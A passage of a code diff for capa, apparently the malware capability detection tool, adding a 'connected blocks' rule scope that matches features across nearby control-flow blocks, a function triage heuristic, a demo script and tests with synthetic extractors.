+ inner = fh.inner + if inner is None: + return "" + section = getattr(inner, "section_name", "") + if isinstance(section, str): + return section + vw = getattr(inner, "vw", None) + va = getattr(inner, "va", None) + if vw is None or va is None: + return "" + for seg_va, seg_size, seg_name, _ in vw.getSegments(): + if seg_va <= va < seg_va + seg_size: + return seg_name + return "" + + +def _collect_size_and_signals(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> tuple[int, int, bool, bool]: + bb_count = 0 + insn_count = 0 + has_api = False + is_thunk_candidate = False + + for bbh in extractor.get_basic_blocks(fh): + bb_count += 1 + instructions = list(extractor.get_instructions(fh, bbh)) + insn_count += len(instructions) + + if bb_count == 1 and 0 < len(instructions) <= 3: + last = instructions[-1].inner + mnem = getattr(last, "mnem", "") + if mnem in ("jmp", "ret"): + is_thunk_candidate = True + + for ih in instructions: + mnem = getattr(ih.inner, "mnem", "") + if isinstance(mnem, str) and mnem.lower().startswith("call"): + has_api = True + break + if has_api and bb_count > 1: + # for triage we only need API presence, not full counting. + continue + + is_thunk = bb_count == 1 and is_thunk_candidate + return bb_count, insn_count, has_api, is_thunk + + +def _has_api_feature_evidence(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> bool: + """ + confirm API evidence using extracted instruction features. + this avoids false negatives from mnemonic-only call heuristics. + """ + for bbh in extractor.get_basic_blocks(fh): + for ih in extractor.get_instructions(fh, bbh): + for feature, _ in extractor.extract_insn_features(fh, bbh, ih): + if isinstance(feature, capa.features.insn.API): + return True + return False + + +def classify_function(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> TriageResult: + if fh.inner is None: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + logger.debug( + "function triage: address=%s decision=%s reason=%s (no function context)", + fh.address, + result.decision.value, + result.reason, + ) + return result + + name = _get_function_name(extractor, fh) + section_name = _get_section_name(fh).lower() + bb_count, insn_count, has_api, is_thunk = _collect_size_and_signals(extractor, fh) + + if not has_api and (is_thunk or section_name in RUNTIME_SECTION_NAMES or (name and bb_count <= 1 and insn_count <= 4)): + has_api = _has_api_feature_evidence(extractor, fh) + + if name and _looks_like_runtime_name(name): + result = TriageResult(TriageDecision.SKIP, REASON_CRT_NAME) + elif is_thunk and not has_api: + result = TriageResult(TriageDecision.SKIP, REASON_THUNK) + elif section_name in RUNTIME_SECTION_NAMES and not has_api and insn_count <= 8: + result = TriageResult(TriageDecision.SKIP, REASON_RUNTIME_SECTION) + elif name and not has_api and bb_count <= 1 and insn_count <= 4: + # conservative skip: only very small/no-API helpers. + result = TriageResult(TriageDecision.SKIP, REASON_TINY_NO_API) + elif bb_count >= 512 or insn_count >= 4096: + result = TriageResult(TriageDecision.DEPRIORITIZE, REASON_LARGE_COMPLEXITY) + else: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + + logger.debug( + "function triage: address=%s decision=%s reason=%s bb=%d insn=%d has_api=%s thunk=%s section=%s name=%s", + fh.address, + result.decision.value, + result.reason, + bb_count, + insn_count, + has_api, + is_thunk, + section_name, + name, + ) + return result + + +def classify_library_function(fh: FunctionHandle) -> TriageResult: + result = TriageResult(TriageDecision.SKIP, REASON_LIBRARY) + logger.debug( + "function triage: address=%s decision=%s reason=%s", + fh.address, + result.decision.value, + result.reason, + ) + return result diff --git a/capa/features/extractors/base_extractor.py b/capa/features/extractors/base_extractor.py index 1be52d06b0..fb8f50e424 100644 --- a/capa/features/extractors/base_extractor.py +++ b/capa/features/extractors/base_extractor.py @@ -265,6 +265,14 @@ def extract_basic_block_features(self, f: FunctionHandle, bb: BBHandle) -> Itera """ raise NotImplementedError() + def get_cfg_edges(self, f: FunctionHandle, bb: BBHandle) -> Iterator[BBHandle]: + """ + enumerate successor basic blocks in the control-flow graph for a given basic block. + + backends without CFG support may yield nothing. + """ + yield from () + @abc.abstractmethod def get_instructions(self, f: FunctionHandle, bb: BBHandle) -> Iterator[InsnHandle]: """ diff --git a/capa/features/extractors/viv/extractor.py b/capa/features/extractors/viv/extractor.py index 99d60e4a80..3882b69e89 100644 --- a/capa/features/extractors/viv/extractor.py +++ b/capa/features/extractors/viv/extractor.py @@ -16,6 +16,7 @@ from typing import Any, Iterator from pathlib import Path +import envi import viv_utils import viv_utils.flirt @@ -84,6 +85,27 @@ def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHa for insn in bb.instructions: yield InsnHandle(address=AbsoluteVirtualAddress(insn.va), inner=insn) + def get_cfg_edges(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[BBHandle]: + f: viv_utils.Function = fh.inner + bb: viv_utils.BasicBlock = bbh.inner + + bb_by_va = {b.va: b for b in f.basic_blocks} + if len(bb.instructions) == 0: + return + + last_insn = bb.instructions[-1] + for bva, bflags in last_insn.getBranches(): + if bva is None: + continue + + if ( + bflags & envi.BR_COND + or bflags & envi.BR_FALL + or bflags & envi.BR_TABLE + or last_insn.mnem == "jmp" + ) and bva in bb_by_va: + yield BBHandle(address=AbsoluteVirtualAddress(bva), inner=bb_by_va[bva]) + def extract_insn_features( self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle ) -> Iterator[tuple[Feature, Address]]: diff --git a/capa/ida/plugin/cache.py b/capa/ida/plugin/cache.py index d7cbfd10ac..9b019e25bd 100644 --- a/capa/ida/plugin/cache.py +++ b/capa/ida/plugin/cache.py @@ -17,6 +17,7 @@ import itertools import collections +from collections import deque from typing import Union, Optional import capa.engine @@ -160,19 +161,53 @@ def _find_basic_block_capabilities( return features, matches, insn_matches + def _build_connected_block_adjacency( + self, fh: FunctionHandle, f_node: CapaRuleGenFeatureCacheNode + ) -> dict[Address, set[Address]]: + adjacency: dict[Address, set[Address]] = collections.defaultdict(set) + bbs_by_address = {bb.address: bb for bb in f_node.children} + for bb in f_node.children: + adjacency[bb.address] + assert isinstance(bb.inner, BBHandle) + for succ in self.extractor.get_cfg_edges(fh, bb.inner): + if succ.address in bbs_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + return adjacency + + @staticmethod + def _collect_connected_neighborhood( + adjacency: dict[Address, set[Address]], seed: Address, depth: int = 2 + ) -> set[Address]: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + def find_code_capabilities( self, ruleset: RuleSet, fh: FunctionHandle - ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults]: + ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults, MatchResults]: f_node: Optional[CapaRuleGenFeatureCacheNode] = self._get_cached_func_node(fh) if f_node is None: - return {}, {}, {}, {} + return {}, {}, {}, {}, {} insn_matches: MatchResults = collections.defaultdict(list) bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) function_features: FeatureSet = collections.defaultdict(set) + bb_features_by_address: dict[Address, FeatureSet] = {} for bb in f_node.children: features, bmatches, imatches = self._find_basic_block_capabilities(ruleset, bb) + bb_features_by_address[bb.address] = features for feature, locs in features.items(): function_features[feature].update(locs) for name, result in bmatches.items(): @@ -180,11 +215,27 @@ def find_code_capabilities( for name, result in imatches.items(): insn_matches[name].extend(result) + if ruleset.connected_block_rules: + adjacency = self._build_connected_block_adjacency(fh, f_node) + for bb in f_node.children: + neighborhood = self._collect_connected_neighborhood(adjacency, bb.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_addr in neighborhood: + for feature, locs in bb_features_by_address.get(bb_addr, {}).items(): + neighborhood_features[feature].update(locs) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, bb.address) + for name, result in matches.items(): + connected_block_matches[name].extend(result) + rule = ruleset[name] + for loc, _ in result: + capa.engine.index_rule_matches(function_features, rule, [loc]) + for feature, locs in itertools.chain(f_node.features.items(), self.global_features.items()): function_features[feature].update(locs) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, f_node.address) - return function_features, function_matches, bb_matches, insn_matches + return function_features, function_matches, connected_block_matches, bb_matches, insn_matches def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchResults]: features: FeatureSet = collections.defaultdict(set) @@ -193,7 +244,7 @@ def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchRes assert func_node.inner is not None assert isinstance(func_node.inner, FunctionHandle) - func_features, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) + func_features, _, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) for feature, locs in func_features.items(): features[feature].update(locs) diff --git a/capa/ida/plugin/form.py b/capa/ida/plugin/form.py index 800453bbfa..600ad0ccb2 100644 --- a/capa/ida/plugin/form.py +++ b/capa/ida/plugin/form.py @@ -1028,14 +1028,16 @@ def load_capa_function_results(self): all_function_features: FeatureSet = collections.defaultdict(set) try: if self.rulegen_current_function is not None: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) all_function_features.update( self.rulegen_feature_cache.get_all_function_features(self.rulegen_current_function) ) - for name, result in itertools.chain(func_matches.items(), bb_matches.items(), insn_matches.items()): + for name, result in itertools.chain( + func_matches.items(), cbb_matches.items(), bb_matches.items(), insn_matches.items() + ): rule = ruleset[name] if rule.is_subscope_rule(): continue @@ -1204,12 +1206,13 @@ def update_rule_status(self, rule_text: str): s in rule.scopes for s in ( capa.rules.Scope.FUNCTION, + capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.INSTRUCTION, ) ): try: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) except Exception as e: @@ -1218,6 +1221,8 @@ def update_rule_status(self, rule_text: str): if capa.rules.Scope.FUNCTION in rule.scopes and rule.name in func_matches: is_match = True + elif capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes and rule.name in cbb_matches: + is_match = True elif capa.rules.Scope.BASIC_BLOCK in rule.scopes and rule.name in bb_matches: is_match = True elif capa.rules.Scope.INSTRUCTION in rule.scopes and rule.name in insn_matches: diff --git a/capa/ida/plugin/model.py b/capa/ida/plugin/model.py index 046dc1ea3f..e600e5c0c7 100644 --- a/capa/ida/plugin/model.py +++ b/capa/ida/plugin/model.py @@ -530,7 +530,10 @@ def render_capa_doc_by_program(self, doc: rd.ResultDocument): parent2 = parent elif capa.rules.Scope.FUNCTION in rule.meta.scopes: parent2 = CapaExplorerFunctionItem(parent, location) - elif capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes: + elif ( + capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes + or capa.rules.Scope.CONNECTED_BLOCKS in rule.meta.scopes + ): parent2 = CapaExplorerBlockItem(parent, location) elif capa.rules.Scope.INSTRUCTION in rule.meta.scopes: parent2 = CapaExplorerInstructionItem(parent, location) diff --git a/capa/loader.py b/capa/loader.py index 88a159af35..253cd04cc5 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -729,7 +729,7 @@ def compute_static_layout(rules: RuleSet, extractor: StaticFeatureExtractor, cap matched_bbs = set() for rule_name, matches in capabilities.items(): rule = rules[rule_name] - if capa.rules.Scope.BASIC_BLOCK in rule.scopes: + if capa.rules.Scope.BASIC_BLOCK in rule.scopes or capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes: for addr, _ in matches: assert addr in functions_by_bb matched_bbs.add(addr) diff --git a/capa/render/proto/__init__.py b/capa/render/proto/__init__.py index 31b272e525..f28d910f1f 100644 --- a/capa/render/proto/__init__.py +++ b/capa/render/proto/__init__.py @@ -155,6 +155,10 @@ def scope_to_pb2(scope: capa.rules.Scope) -> capa_pb2.Scope.ValueType: return capa_pb2.Scope.SCOPE_FILE elif scope == capa.rules.Scope.FUNCTION: return capa_pb2.Scope.SCOPE_FUNCTION + elif scope == capa.rules.Scope.CONNECTED_BLOCKS: + # protobuf schema does not yet have a dedicated static connected-block scope enum. + # encode as basic block for wire compatibility. + return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.BASIC_BLOCK: return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.INSTRUCTION: diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..49170b1440 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -89,6 +89,7 @@ class Scope(str, Enum): SPAN_OF_CALLS = "span of calls" CALL = "call" FUNCTION = "function" + CONNECTED_BLOCKS = "connected blocks" BASIC_BLOCK = "basic block" INSTRUCTION = "instruction" @@ -107,6 +108,7 @@ def to_yaml(cls, representer, node): Scope.FILE, Scope.GLOBAL, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, } @@ -219,6 +221,10 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": capa.features.common.Characteristic("recursive call"), # plus basic block scope features, see below }, + Scope.CONNECTED_BLOCKS: { + capa.features.common.MatchedRule, + # plus basic block scope features, see below + }, Scope.BASIC_BLOCK: { capa.features.common.MatchedRule, capa.features.common.Characteristic("tight loop"), @@ -252,6 +258,7 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # global scope features are available in all other scopes SUPPORTED_FEATURES[Scope.INSTRUCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.GLOBAL]) +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FILE].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.PROCESS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) @@ -269,6 +276,8 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # all instruction scope features are also basic block features SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.INSTRUCTION]) +# all basic block scope features are also connected blocks features +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) # all basic block scope features are also function scope features SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) @@ -588,9 +597,31 @@ def unique(sequence): return [x for x in sequence if not (x in seen or seen.add(x))] # type: ignore [func-returns-value] +def parse_connected_blocks_subscope_key(key: str) -> bool: + """ + return True when the key denotes a connected-blocks subscope declaration. + + supported forms: + - connected blocks + - connected_blocks(depth=2) + """ + if key == "connected blocks": + return True + + if not key.startswith("connected_blocks(") or not key.endswith(")"): + return False + + body = key[len("connected_blocks(") : -len(")")] + if body != "depth=2": + raise InvalidRule("only connected_blocks(depth=2) is supported") + + return True + + STATIC_SCOPE_ORDER = [ Scope.FILE, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, ] @@ -707,7 +738,7 @@ def build_statements(d, scopes: Scopes): elif key == "basic block": if not is_subscope_compatible(scopes.static, Scope.BASIC_BLOCK): - raise InvalidRule("`basic block` subscope supported only for `function` scope") + raise InvalidRule("`basic block` subscope supported only for `function` and `connected blocks` scope") if len(d[key]) != 1: raise InvalidRule("subscope must have exactly one child statement") @@ -716,9 +747,25 @@ def build_statements(d, scopes: Scopes): Scope.BASIC_BLOCK, build_statements(d[key][0], Scopes(static=Scope.BASIC_BLOCK)), description=description ) + elif parse_connected_blocks_subscope_key(key): + if not is_subscope_compatible(scopes.static, Scope.CONNECTED_BLOCKS): + raise InvalidRule("`connected blocks` subscope supported only for `function` scope") + + if len(d[key]) != 1: + raise InvalidRule("subscope must have exactly one child statement") + + # MVP: fixed proximity depth=2 in static matching pipeline. + return ceng.Subscope( + Scope.CONNECTED_BLOCKS, + build_statements(d[key][0], Scopes(static=Scope.CONNECTED_BLOCKS)), + description=description, + ) + elif key == "instruction": if not is_subscope_compatible(scopes.static, Scope.INSTRUCTION): - raise InvalidRule("`instruction` subscope supported only for `function` and `basic block` scope") + raise InvalidRule( + "`instruction` subscope supported only for `function`, `connected blocks`, and `basic block` scope" + ) if len(d[key]) == 1: statements = build_statements(d[key][0], Scopes(static=Scope.INSTRUCTION)) @@ -1433,6 +1480,7 @@ def __init__( Scope.PROCESS, Scope.INSTRUCTION, Scope.BASIC_BLOCK, + Scope.CONNECTED_BLOCKS, Scope.FUNCTION, Scope.FILE, ) @@ -1475,6 +1523,10 @@ def function_rules(self): def basic_block_rules(self): return self.rules_by_scope[Scope.BASIC_BLOCK] + @property + def connected_block_rules(self): + return self.rules_by_scope[Scope.CONNECTED_BLOCKS] + @property def instruction_rules(self): return self.rules_by_scope[Scope.INSTRUCTION] diff --git a/scripts/demo_connected_blocks_and_triage.py b/scripts/demo_connected_blocks_and_triage.py new file mode 100644 index 0000000000..ac8f9b7e8a --- /dev/null +++ b/scripts/demo_connected_blocks_and_triage.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Demo helper for: + - function triage counts (skip/deprioritize/analyze) + - connected-block rule syntax +""" + +import argparse +import textwrap +from pathlib import Path +from collections import Counter +from typing import Counter as CounterType + +import capa.loader +import capa.rules +from capa.rules import Scope +from capa.capabilities.triage import TriageDecision, classify_function +from capa.features.extractors.viv.extractor import VivisectFeatureExtractor +from capa.features.common import OS_AUTO, FORMAT_AUTO + + +CONNECTED_BLOCKS_RULE = textwrap.dedent( + """ + rule: + meta: + name: demo connected blocks + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile + """ +) + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("input", type=Path, help="sample path") + args = parser.parse_args() + + vw = capa.loader.get_workspace(args.input, FORMAT_AUTO, sigpaths=[]) + extractor = VivisectFeatureExtractor(vw, args.input, OS_AUTO) + + triage_counts: CounterType[str] = Counter() + for fh in extractor.get_functions(): + if extractor.is_library_function(fh.address): + triage_counts[TriageDecision.SKIP.value] += 1 + continue + triage = classify_function(extractor, fh) + triage_counts[triage.decision.value] += 1 + + print("triage counts:") + print(f" analyze : {triage_counts[TriageDecision.ANALYZE.value]}") + print(f" deprioritize : {triage_counts[TriageDecision.DEPRIORITIZE.value]}") + print(f" skip : {triage_counts[TriageDecision.SKIP.value]}") + print() + print("connected blocks rule syntax:") + print(CONNECTED_BLOCKS_RULE.strip()) + + r = capa.rules.Rule.from_yaml(CONNECTED_BLOCKS_RULE) + print() + print("parsed rule scopes:", r.scopes) + print("connected blocks scope literal:", Scope.CONNECTED_BLOCKS.value) + + +if __name__ == "__main__": + main() diff --git a/tests/test_capabilities.py b/tests/test_capabilities.py index 809173da22..df44b9a45e 100644 --- a/tests/test_capabilities.py +++ b/tests/test_capabilities.py @@ -346,3 +346,28 @@ def test_instruction_subscope(z9324d_extractor): capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) assert "push 1000 on i386" in capabilities.matches assert 0x406F60 in {result[0] for result in capabilities.matches["push 1000 on i386"]} + + +def test_connected_blocks_subscope(z9324d_extractor): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected block helper + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.TerminateThread + """ + ) + ) + ] + ) + capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) + assert "connected block helper" in capabilities.matches diff --git a/tests/test_connected_blocks.py b/tests/test_connected_blocks.py new file mode 100644 index 0000000000..4419c13fa0 --- /dev/null +++ b/tests/test_connected_blocks.py @@ -0,0 +1,158 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import textwrap + +import capa.rules +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.features.extractors.null import ( + FunctionFeatures, + BasicBlockFeatures, + InstructionFeatures, + NullStaticFeatureExtractor, +) +from capa.features.extractors.base_extractor import BBHandle, SampleHashes +from capa.capabilities.common import find_capabilities + + +class GraphNullStaticExtractor(NullStaticFeatureExtractor): + def __init__(self, *args, edges=None, **kwargs): + super().__init__(*args, **kwargs) + self._edges = edges or {} + + def get_cfg_edges(self, f, bb): + for succ in self._edges.get(int(f.address), {}).get(int(bb.address), []): + yield BBHandle(AbsoluteVirtualAddress(succ), None) + + +def make_graph_extractor(): + fva = AbsoluteVirtualAddress(0x401000) + b0 = AbsoluteVirtualAddress(0x401000) + b1 = AbsoluteVirtualAddress(0x401100) + b2 = AbsoluteVirtualAddress(0x401200) + b3 = AbsoluteVirtualAddress(0x401300) + b4 = AbsoluteVirtualAddress(0x401400) + b5 = AbsoluteVirtualAddress(0x401500) + + return GraphNullStaticExtractor( + base_address=AbsoluteVirtualAddress(0x400000), + sample_hashes=SampleHashes(md5="", sha1="", sha256=""), + global_features=[], + file_features=[], + functions={ + fva: FunctionFeatures( + features=[], + basic_blocks={ + b0: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401001): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401001), API("CreateFileA"))] + ) + }, + ), + b1: BasicBlockFeatures(features=[], instructions={}), + b2: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401201): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401201), API("WriteFile"))] + ) + }, + ), + b3: BasicBlockFeatures( + features=[], + instructions={}, + ), + b4: BasicBlockFeatures( + features=[], + instructions={}, + ), + b5: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401501): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401501), API("CloseHandle"))] + ) + }, + ), + }, + ) + }, + edges={ + int(fva): { + int(b0): [int(b1)], + int(b1): [int(b2)], + int(b2): [int(b3)], + int(b3): [int(b4)], + int(b4): [int(b5)], + } + }, + ) + + +def test_connected_blocks_depth2_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks depth2 + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: WriteFile + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks depth2" in capabilities.matches + assert AbsoluteVirtualAddress(0x401000) in {m[0] for m in capabilities.matches["connected blocks depth2"]} + + +def test_connected_blocks_too_far_no_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks too far + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: CloseHandle + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks too far" not in capabilities.matches diff --git a/tests/test_proto.py b/tests/test_proto.py index b0dc106040..8ce69bac19 100644 --- a/tests/test_proto.py +++ b/tests/test_proto.py @@ -125,6 +125,7 @@ def test_addr_to_pb2(): def test_scope_to_pb2(): assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FILE) == capa_pb2.SCOPE_FILE assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FUNCTION) == capa_pb2.SCOPE_FUNCTION + assert capa.render.proto.scope_to_pb2(capa.rules.Scope.CONNECTED_BLOCKS) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.BASIC_BLOCK) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.INSTRUCTION) == capa_pb2.SCOPE_INSTRUCTION assert capa.render.proto.scope_to_pb2(capa.rules.Scope.PROCESS) == capa_pb2.SCOPE_PROCESS @@ -313,6 +314,17 @@ def assert_feature(fa, fb): elif isinstance(fa, capa.features.freeze.features.APIFeature): assert fa.api == fb.api + elif isinstance(fa, capa.features.freeze.features.ArgumentStringFeature): + assert fa.name == fb.name + assert fa.argument_string == fb.argument_string + + elif isinstance(fa, capa.features.freeze.features.ArgumentNumberFeature): + assert fa.name == fb.name + assert fa.argument_number == getattr(fb.argument_number, fb.argument_number.WhichOneof("value")) + + elif isinstance(fa, capa.features.freeze.features.ReturnValueFeature): + assert fa.return_value == getattr(fb.return_value, fb.return_value.WhichOneof("value")) + elif isinstance(fa, capa.features.freeze.features.PropertyFeature): assert fa.property == fb.property_ assert fa.access == fb.access diff --git a/tests/test_rules_insn_scope.py b/tests/test_rules_insn_scope.py index 86ebcd35b2..7402bb689e 100644 --- a/tests/test_rules_insn_scope.py +++ b/tests/test_rules_insn_scope.py @@ -131,6 +131,42 @@ def test_scope_instruction_description(): ) ) + +def test_rule_subscope_connected_blocks(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: test connected blocks subscope + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - mnemonic: mov + - arch: i386 + """ + ) + ) + ] + ) + + # parent function scope rule + derived connected-blocks subscope rule. + assert len(rules.function_rules) == 1 + assert len(rules.connected_block_rules) == 1 + + +def test_scope_connected_blocks_ordering(): + assert capa.rules.is_subscope_compatible(capa.rules.Scope.FUNCTION, capa.rules.Scope.CONNECTED_BLOCKS) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.INSTRUCTION) + assert not capa.rules.is_subscope_compatible(capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.CONNECTED_BLOCKS) + capa.rules.Rule.from_yaml( textwrap.dedent( """ diff --git a/tests/test_triage.py b/tests/test_triage.py new file mode 100644 index 0000000000..57a783f492 --- /dev/null +++ b/tests/test_triage.py @@ -0,0 +1,145 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.capabilities.triage import ( + REASON_CRT_NAME, + REASON_LARGE_COMPLEXITY, + REASON_TINY_NO_API, + TriageDecision, + classify_function, +) +from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, SampleHashes, StaticFeatureExtractor + + +class FakeInsn: + def __init__(self, mnem: str = "nop"): + self.mnem = mnem + + +class FakeFunction: + section_name = ".text" + + +class FakeTriageExtractor(StaticFeatureExtractor): + def __init__(self, names=None, function_data=None): + super().__init__(SampleHashes(md5="", sha1="", sha256="")) + self.names = names or {} + self.function_data = function_data or {} + + def get_base_address(self): + return AbsoluteVirtualAddress(0x0) + + def extract_global_features(self): + yield from () + + def extract_file_features(self): + yield from () + + def get_functions(self): + for fva in sorted(self.function_data): + yield FunctionHandle(AbsoluteVirtualAddress(fva), FakeFunction()) + + def get_function_name(self, addr): + if int(addr) not in self.names: + raise KeyError(addr) + return self.names[int(addr)] + + def extract_function_features(self, f): + yield from () + + def get_basic_blocks(self, f): + for bva in sorted(self.function_data[int(f.address)]["bbs"]): + yield BBHandle(AbsoluteVirtualAddress(bva), None) + + def extract_basic_block_features(self, f, bb): + yield from () + + def get_instructions(self, f, bb): + for iva, mnem in self.function_data[int(f.address)]["bbs"][int(bb.address)]: + yield InsnHandle(AbsoluteVirtualAddress(iva), FakeInsn(mnem)) + + def extract_insn_features(self, f, bb, insn): + for feature in self.function_data[int(f.address)].get("insn_features", {}).get(int(insn.address), ()): + yield feature, insn.address + + +def test_triage_classify_crt_name_skip(): + extractor = FakeTriageExtractor( + names={0x401000: "__security_init_cookie"}, + function_data={0x401000: {"bbs": {0x401000: [(0x401000, "ret")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x401000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_CRT_NAME + + +def test_triage_classify_tiny_no_api_skip(): + extractor = FakeTriageExtractor( + names={0x402000: "sub_402000"}, + function_data={0x402000: {"bbs": {0x402000: [(0x402000, "nop"), (0x402001, "nop")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x402000), FakeFunction()) + + result = 